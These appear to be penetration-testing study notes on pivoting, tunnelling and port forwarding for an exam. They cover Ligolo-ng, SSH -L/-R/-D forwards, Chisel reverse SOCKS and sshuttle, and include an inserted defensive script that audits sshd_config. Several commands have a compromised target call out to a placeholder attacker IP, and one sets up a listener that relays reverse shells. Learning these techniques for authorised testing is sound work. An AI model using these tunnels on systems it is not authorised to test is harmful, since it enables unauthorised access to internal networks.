Pentest_Notes

🔀 Pivoting, Tunneling & Port Forwarding

Organized notes for pivoting, tunneling, and port forwarding techniques. Last Updated: 2026-03-27


Overview

Pivoting allows you to access internal networks through a compromised host. This is critical when targets exist on network segments not directly accessible from the attacker machine.


Ligolo-ng

Checklist

Server Side (Attacker)

# Create TUN interface
sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up

# Run the proxy
./proxy -selfcert

Target Side

# Windows
.\agent.exe -connect <ATTACKER_IP>:11601 -ignore-cert
# Linux
./agent -connect <ATTACKER_IP>:11601 -ignore-cert

Route Configuration

# Add target network as route
ip route add 192.168.x.0/24 dev ligolo

Ligolo Commands

# Enter a session
session
# (choose the appropriate session)

# Start tunneling
start

# Confirm active tunnels
tunnel_list

Reverse Shell Listener Through Ligolo

# Create a listener on the agent (0.0.0.0:1234) that forwards connections to a port on the proxy/attacker host
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444

Cleanup

# Remove routes when done
ip route del 192.168.x.0/24 dev ligolo

⚠️ CPTS Exam Tip: Ligolo-ng is the preferred pivoting tool. Practice the setup thoroughly; you WILL need it in the exam.


SSH Tunneling

Local Port Forward

# Forward local port to remote service
ssh -L <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> user@<PIVOT_HOST>

# Example: Access internal web server on port 80
ssh -L 8080:10.10.10.5:80 user@pivot.com
# Then browse: http://127.0.0.1:8080

Remote Port Forward

# Forward a port on the SSH server back to a port reachable from the SSH client.
# Run on the pivot host: the attacker box listens on <REMOTE_PORT> and forwards to the pivot's localhost:<LOCAL_PORT>
ssh -R <REMOTE_PORT>:localhost:<LOCAL_PORT> user@<ATTACKER_IP>

# Example: run on the attacker box to expose attacker port 4444 as port 4444 on the pivot host
ssh -R 4444:localhost:4444 user@pivot.com
# Note: the -R listener binds to loopback on the SSH server unless GatewayPorts is enabled in its sshd_config

Dynamic SOCKS Proxy

# Create SOCKS proxy
ssh -D 1080 user@<PIVOT_HOST> -N -f

# Use with proxychains
# Edit /etc/proxychains4.conf:
# socks5 127.0.0.1 1080
proxychains nmap -sT -Pn <INTERNAL_IP>
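
Every forward above (-L, -R, -D) depends on what the pivot host's sshd permits, so checking those directives is the quickest way to see whether a host can be used this way. The helper below is an added, defender-side example and not part of these notes: it reads an sshd_config, applies sshd's first-occurrence rule for the global section, and reports tunnelling-related settings that differ from a hardened baseline. Keyword defaults are taken from sshd_config(5); the sample config is constructed.

```python
import re

# Effective defaults from sshd_config(5) when the keyword is absent.
DEFAULTS = {
    "allowtcpforwarding": "yes",  # permits -L and -D (direct-tcpip channels)
    "gatewayports": "no",         # whether -R listeners may bind non-loopback
    "permittunnel": "no",         # tun/tap device forwarding (ssh -w)
    "permitopen": "any",          # destinations allowed for -L and -D
}
# Baseline for a host with no business need for SSH forwarding.
HARDENED = {"allowtcpforwarding": "no", "gatewayports": "no",
            "permittunnel": "no", "permitopen": "none"}

def effective_settings(config_text):
    """Effective value of each DEFAULTS keyword in the global section.
    sshd honours the FIRST occurrence of a keyword, so later duplicates are
    ignored. Parsing stops at the first Match block, whose overrides apply
    only to the matching users/hosts and need separate review."""
    found = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        m = re.match(r"(\S+?)(?:\s*=\s*|\s+)(.+)", line)  # "Key value" or "Key=value"
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip().lower()
        if key == "match":
            break
        if key in DEFAULTS and key not in found:
            found[key] = value
    return {k: found.get(k, v) for k, v in DEFAULTS.items()}

def audit_forwarding(config_text):
    """(keyword, effective, recommended) for each setting weaker than HARDENED."""
    eff = effective_settings(config_text)
    return [(k, eff[k], HARDENED[k]) for k in DEFAULTS if eff[k] != HARDENED[k]]

# Constructed sample: forwarding enabled globally, restricted for one user only.
WEAK_CONFIG = """\
AllowTcpForwarding yes
GatewayPorts clientspecified
Match User backup
    AllowTcpForwarding no
"""

if __name__ == "__main__":
    for key, current, wanted in audit_forwarding(WEAK_CONFIG):
        print(f"{key}: {current!r} (recommended {wanted!r})")
```

Run it against `/etc/sshd_config` (or `sshd -T` output) on a host under review; an empty result means all four directives already match the baseline.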

Chisel

Chisel is a popular alternative to Ligolo-ng.

Reverse SOCKS Proxy

# On attacker (server)
./chisel server --reverse --port 8000

# On target (client)
./chisel client <ATTACKER_IP>:8000 R:socks

Port Forward

# On attacker
./chisel server --reverse --port 8000

# On target: forward a specific port
./chisel client <ATTACKER_IP>:8000 R:8888:<INTERNAL_IP>:80

SSHuttle

# Route traffic through SSH
sshuttle -r user@<PIVOT_HOST> <INTERNAL_SUBNET>/24

# With SSH key
sshuttle -r user@<PIVOT_HOST> --ssh-cmd "ssh -i id_rsa" <INTERNAL_SUBNET>/24

Common Pitfalls / Gotchas

References & Further Reading